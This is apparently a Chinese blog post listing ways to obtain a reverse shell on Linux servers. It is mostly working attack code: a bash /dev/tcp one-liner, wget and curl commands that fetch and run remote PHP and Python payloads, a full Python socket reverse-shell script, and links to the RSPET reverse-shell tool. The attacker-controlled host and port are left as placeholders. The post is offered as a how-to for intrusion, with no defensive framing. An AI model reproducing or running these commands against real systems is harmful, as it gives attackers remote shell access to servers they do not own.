shell反弹的几种方式

0x01 直接利用linux上的bash进行反弹

nc本地监听
nc -l -p port -vv</span>
base反弹
bash -i >& /dev/tcp/ownip/port 0>&1


0x02 利用其他服务器运行环境反弹,比如php,python等。
nc本地监听
nc -l -p port -vv</span>




由于一般php语句在服务器容易出错,可以利用下面的linux命令,把这段php放到自己的服务器上
linux命令如下
需要反弹的ip和端口填写自己的外网ip和端口任意,保存到自己的服务器上为test.txt文件即可。

wget方式


利用wget进行下载执行
wget http://localhost/test.txt -O /tmp/x.php && php /tmp/x.php 

test.txt内容
<?php
$sock=fsockopen("localhost",12345);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>

curl方式
利用curl进行执行
curl -sS http://localhost/test.py | python

test.py文件

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("localhost",12345)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])


#这个没有测试成功

0x03基于python的反连shell工具

服务端运行
python RSPET_server.py (max_connections) 
客户端执行
python RSPET_client.py server_ip

服务端文件

https://github.com/panagiks/RSPET/blob/master/Server/RSPET_server.py

https://raw.githubusercontent.com/panagiks/RSPET/master/Server/RSPET_server.py

客户端文件

https://github.com/panagiks/RSPET/blob/master/Client/RSPET_client.py

https://raw.githubusercontent.com/panagiks/RSPET/master/Client/RSPET_client.py


0x04 其他反弹shell方法,可以参考如下文章


参考:

http://www.freebuf.com/sectool/105698.html

http://www.myhack58.com/Article/html/3/8/2014/48255.htm

http://www.waitalone.cn/linux-shell-rebound-under-way.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值